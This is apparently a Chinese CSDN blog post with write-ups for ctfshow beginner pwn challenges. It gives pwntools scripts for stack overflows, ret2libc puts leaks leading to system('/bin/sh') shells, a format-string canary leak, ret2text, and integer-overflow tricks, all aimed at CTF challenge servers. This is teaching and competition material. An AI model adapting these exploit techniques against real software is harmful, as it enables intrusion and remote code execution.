ctfshow-pwn新手/萌新赛

于 2024-07-23 14:40:46 发布
阅读量358 收藏 4
点赞数 3
文章标签: python
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/wgf42421/article/details/140635876
版权

ctfwork pwn题目

pwn03

先用puts覆盖ebp输出puts_got真实地址addr

然后通过 https://libc.blukat.me/ 查询一下 puts 及后三位 360

得到libc中puts_libc, system_libc , bin_sh_libc 的地址,

用addr-puts_libc得到基址, 再计算得到 system和bin_sh的地址。覆盖ebp得到shell

from pwn import *

context.log_level = 'debug'
context.terminal = ["tmux", "splitw", "-h"]
io = process("./stack1")
io = remote('pwn.challenge.ctf.show', 28023)
# gdb.attach(io, '''
# b * 0x80484DE
# ''')


elf = ELF("./stack1")
puts_plt = elf.plt["puts"]
puts_got = elf.got["puts"]
main_addr = elf.symbols["main"]
payload1 = flat(b"A" * (9 + 4), puts_plt, main_addr, puts_got)  # 泄露puts_got
io.recvuntil("\n\n")
io.sendline(payload1)
puts_addr = unpack(io.recv(4))
print(hex(puts_addr))
# 0xf7d6d360 查一下 https://libc.blukat.me/

puts_libc = 0x067360
system_libc = 0x03cd10
str_bin_sh_libc = 0x17b8cf

base = puts_addr - puts_libc
system = base + system_libc
bin_sh = base + str_bin_sh_libc

payload2 = flat('a' * 13, system, 1, bin_sh )
io.sendline(payload2)
io.interactive()

pwn04

canary作用:防止栈破坏,将canary放在栈中,在返回时检测canary有没有被修改过

checksec有canary保护, ida分析 1.有后门。 2.格式化字符串漏洞

流程: 1.第一轮输出得到canary值 2.第二轮构造payload: 填充值+canary+填充+getshell_addr , 返回到getshell

unsigned int vuln()
{
  v3 = __readgsdword(0x14u);  // 这就是canary特征 这里下断
  for ( i = 0; i <= 1; ++i )
  {
    read(0, &buf, 0x200u);
    printf(&buf);             // 格式化漏洞
  }
  return __readgsdword(0x14u) ^ v3;
}

对应汇编

.text:08048634                 mov     eax, large gs:14h     ; canary保存到eax
.text:0804863A                 mov     [ebp+var_C], eax      ; 对应这里下断点,看eax值

在gdb中调试查看 eax值即canary为 0x2f986300

2.printf这里下断点, x/50wx $esp栈上打印出来,找到canary

.text:08048664                 push    eax             ; format
.text:08048665                 call    _printf
.text:0804866A                 add     esp, 10h

打印栈信息 x/40wx $esp

esp
0xffffd460:     0xffffd478      0xffffd478(1)   0x00000200(2)   0xf7e7e3bc
0xffffd470:     0xf7fc7000      0x00000000      0xf70a3231      0xf7e7ee22
0xffffd480:     0xf7fc7d60      0x0000000a      0xf7e7422b      0xf7fc7000
0xffffd490:     0xf7e7ede7      0xf7fc7000      0x0000000d      0xf7e73e0b
0xffffd4a0:     0xf7fc7d60      0x0000000a      0x0000000d      0xf7e7a000
0xffffd4b0:     0xf7fe77eb      0xf7e13700      0x00000000      0xf7fc7d60
0xffffd4c0:     0xffffd508      0xf7fee010      0xf7e73cbb      0x00000000
0xffffd4d0:     0xf7fc7000      0xf7fc7000      0xffffd508      0x2f986300(31) ;在这偏移31, (栈顶值不算)
0xffffd4e0:     0x08048768      0x02000000      0xffffd508      0x080486c1

leak_canary = 31

把canary在栈覆盖的中间插入不进行破坏在中

pwn06

from pwn import *

context.arch = 'amd64'

sh = remote("pwn.challenge.ctf.show", 28196)
# sh = process("pwn06")
junk = 'a' * (0xc + 8)

# run_cmd = 0x40057B
# payload = flat(junk, run_cmd)

# 方法2
ret = 0x40058E
get_flag = 0x400577
payload = flat(junk, ret, get_flag)

sh.sendline(payload)
sh.interactive()

pwn07

from pwn import *

context.arch = 'amd64'

io = remote("pwn.challenge.ctf.show", 28160)
# io = process("pwn07")
e = ELF('../pwn07')

main_addr = e.symbols['welcome']
puts_plt = e.symbols["puts"]
puts_got = e.got["puts"]
pop_rdi_ret = 0x04006e3

junk = 'a' * (0xc + 8)

payload = flat(junk, pop_rdi_ret, puts_got, puts_plt, main_addr)

io.sendline(payload)

addr = io.recv().strip(b'\n')[-6:]
addr = unpack(addr.ljust(8, b'\x00'))  # 地址是6bytes, 补到8位unpack
print(hex(addr))

# https://libc.blukat.me/ 查一下 puts 9c0  查后三位就行
ret = 0x000040061E
system_addr = 0x04f440
puts = 0x0809c0
str_bin_sh = 0x1b3e9a
base = addr - puts

system = base + system_addr
bin_sh = base + str_bin_sh
payload = flat(junk, ret, pop_rdi_ret, bin_sh, system)  # ubuntu64需要栈对齐, 加个ret
io.sendline(payload)

io.interactive()

# 本地exp
# libc = ELF('/lib/x86_64-linux-gnu/libc.so.6')
# base = addr - libc.symbols['puts']
#
# system = base + libc.symbols["system"]
# bin_sh = base + libc.search(b'/bin/sh').__next__()
# payload = flat(junk, pop_rdi_ret, bin_sh, system)
# io.sendline(payload)
#
# io.interactive()

数学99

第一步普通整数溢出

有符号整数整数溢出, 2**32 -1 == -1 2**31+1== INT_MIN 用-1 减 -10即可

第二步,2**(32*n) + 9 的整数溢出, 爆破一下

import sys

for m in range(10):
    res = 2 ** (32 + m) + 9
    for i in range(10, 100):
        if res % i == 0:
            print(i, res / i)
            sys.exit()

signal(8, handler)

// 见signal.h
#define SIGFPE 8 // 浮点溢出错误

https://baike.baidu.com/item/SIGFPE/22776976?fr=aladdin

触发方法

1.整数除以零 2.INT_MIN除以-1



from pwn import *

context.arch = 'amd64'

io = remote("stack.challenge.ctf.show", 28091)
# io = process("pwn2")
print(io.recv().decode())
io.sendline('4294967295')
io.sendline('4294967286')
io.sendline('48145')
io.sendline('89209')
io.sendline(str(2**31)) # INT_MIN
io.sendline(str(-1))

io.interactive()

web1, web2, web3, web4

?id='1000'

wgf42421
关注
  • 3
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
CTF show萌新题系列
12-22
题目地址:https://ctf.show 0X01 萌新_密码1 1.16进制转字符串 有很多网站可以实现,这里我也附上我的脚本: # author: 羽 def hex_to_str(): while True: s = input("输入要转成字符串的16进制(输入空字符串退出):") if s=='': break k='' try: for i in range(0,len(s),2): j = s[i]+s[i+1]
Wi-PWN_8.0_ENGLISH.bin
08-25
ESP8266的WIFI杀手固件,这是不带显示的。 我后续更新带OLED显示的固件。教程后将更新。
CTFSHOW--萌新
最新发布
qq_75120258的博客
05-30 939
打开环境以为是SQL注入,尝试输入SQL语句/?name=asd',发现被转义了题目是给她,和git很相似,使用dirsearch扫一扫发现git泄露,使用GITHACK工具扫到一个hit.php。
ctfshow萌新经验总结
m0_62422842的博客
06-05 1767
涉及到的相关知识: sql注入中的sprintf格式化字符串漏洞。 基于约束的sql注入攻击。 利用Burpsuite Fuzz实现sql注入
ctfshow 萌xin
weixin_63231007的博客
04-25 1536
萌新 给她 git源码泄露.得到源码为 <?php $pass=sprintf("and pass='%s'",addslashes($_GET['pass'])); $sql=sprintf("select * from user where name='%s' $pass",addslashes($_GET['name'])); ?> 查看别人题解,里写了有关sprintf函数的作用漏洞。从WordPress SQLi谈PHP格式化字符串问题(2017.11.01更新)
ctfshow-萌新记忆
XYH_233的博客
03-18 531
ctfshow 萌新记忆
CSAWCTF-2018-pwn-shellcode|CSAWCTF-2018-pwn-shellcode
12-10
CSAWCTF 2018年pwn题 shellcode 变形shellcode练手题目,该题目主要是利用三个节点来注入shellcode,考验解题人对shellcode的熟悉程度。题解:https://blog.csdn.net/A951860555/article/details/110350773
Wi-PWN_8.0_ENGLISH_OLED.bin
08-25
这是ESP8266的带OLED显示的WIFI杀手固件。
mqtt-pwn:MQTT-PWN打算成为IoT Broker渗透测试和安全评估操作的一站式服务
05-02
MQTT-PWN MQTT是一种机器对机器的连接协议,被设计为一种极其轻量级的发布/订阅消息传递,并已被全球数百万个IoT设备广泛使用。 MQTT-PWN打算成为IoT Broker渗透测试和安全评估操作的一站式商店,因为它结合了枚举...
ctf题库ctf-pwn题收集
03-31
ctf题库 CTF(夺旗)题库是一个由安全专家和爱好者们制作的一系列网络安全挑战。... ...每个类别都包含多个挑战,每个挑战都有一个或多个标志(flag)。参者必须通过解决每个挑战来获取相应的标志,然后提交标志以获得...
ctfshow 萌xinmisc
Demodd的博客
01-24 816
前言 不想学web的时候,刷misc摸鱼(然后摸的有点久),萌xin的题做起来也有点点点点点点费劲。。。 qrcode 打开txt发现txt里只有01查看长度发现是625位,根据题目名称明显是25*25的二维码 from PIL import Image strings = open('qrcode.txt','r').read() print(strings) pic = Image.new("RGB",(25,25)) num = 0 for x in range(25): for y in
ctfshow 萌新web系列--2
qq_61632010的博客
08-25 224
<html> <head> <title>ctf.show萌新计划web1</title> <meta charset="utf-8"> </head> <body> <?php # 包含数据库连接文件 include("config.php"); # 判断get提交的参数id是否存在 i...
ctfshow-web萌新(详解)
m0_63641882的博客
11-06 339
1.addslashes函数+sping的漏洞2.cookie的盗用3.代码审计+正则过滤。
ctfshow之_萌新web9至web10
XiaoXiao_RenHe的专栏
05-09 469
ctfshow之_萌新web9至web10
ctfshow 萌新 给她
qq_39980334的博客
11-15 1738
.git泄露 sprintf绕过 伪协议
ctfshow-萌新
qq_43618536的博客
07-14 4037
ctfshow-萌新
ctfshow-萌新Crypto
qq_42016346的博客
03-13 3048
萌新密码学_签到题 Ao(mgHXE)AN2PSBOu3qI0o 开头的Ao(mg就是flag base85编码后的结果 直接在线https://www.qtool.net/baseencode得到flag 萌新密码学_抱我 分析源码可以发现就是 大循环299次每次随机从[0,36]之间选个数字 再从cssting取出对应位置的字符添加到密文中 接着进入小循环10次 随机从[0, l...
CTF show 萌新web
羽的博客
03-06 3344
平台地址:https://ctf.show 0x01 web_签到 源码: <?php if(isset($_GET['url'])){ system("curl https://".$_GET['url'].".ctf.show"); }else{ show_source(__FILE__); } ?> 很明显的命令执行漏洞,我们把前后闭合即可,...
mqtt-pwn安装
09-20
安装mqtt-pwn的步骤如下: 1. 克隆mqtt-pwn仓库:使用命令`git clone https://github.com/akamai-threat-research/mqtt-pwn.git`将mqtt-pwn仓库克隆到本地。 2. 进入mqtt-pwn目录:使用命令`cd mqtt-pwn`进入mqtt-pwn所在的目录。 3. 启动mqtt-pwn容器:使用命令`sudo docker-compose up --build --detach`启动mqtt-pwn容器。 另外,您还需要安装以下软件: 1. 安装pwntools:使用命令`python3 -m pip install --upgrade pwntools`来安装并更新pwntools。 2. 安装mosquitto程序和mosquitto-clients客户端程序:使用命令`sudo apt install mosquitto`和`sudo apt install mosquitto-clients`来安装mosquitto程序和mosquitto-clients客户端程序。 请注意,以上步骤假设您已经在Linux环境下进行操作。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值